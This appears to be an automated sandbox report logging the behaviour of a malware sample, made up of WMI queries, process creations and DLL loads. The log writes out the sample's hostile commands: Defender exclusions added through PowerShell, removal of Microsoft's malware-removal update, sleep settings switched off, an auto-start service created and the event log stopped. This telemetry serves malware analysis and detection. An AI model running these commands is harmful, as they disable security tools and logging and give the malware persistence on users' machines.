            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 12Jh49DCAj.exeReversingLabs: Detection: 63%
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeFile read: C:\Users\user\Desktop\12Jh49DCAj.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\12Jh49DCAj.exe "C:\Users\user\Desktop\12Jh49DCAj.exe"
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "ODTUTVYC"
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "ODTUTVYC" binpath= "C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe" start= "auto"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "ODTUTVYC"
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
            Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\explorer.exe explorer.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "ODTUTVYC"Jump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "ODTUTVYC" binpath= "C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe" start= "auto"Jump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "ODTUTVYC"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll (12 occurrences: four further powercfg.exe instances, each loading it three times)
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll (4 occurrences, one per powercfg.exe instance)
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe Section loaded: wbemcomn.dll
Source: C:\Windows\explorer.exe Section loaded: amsi.dll
Source: C:\Windows\explorer.exe Section loaded: profapi.dll
Source: C:\Windows\explorer.exe Section loaded: wbemcomn.dll (149 further loads, 150 in total)
Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
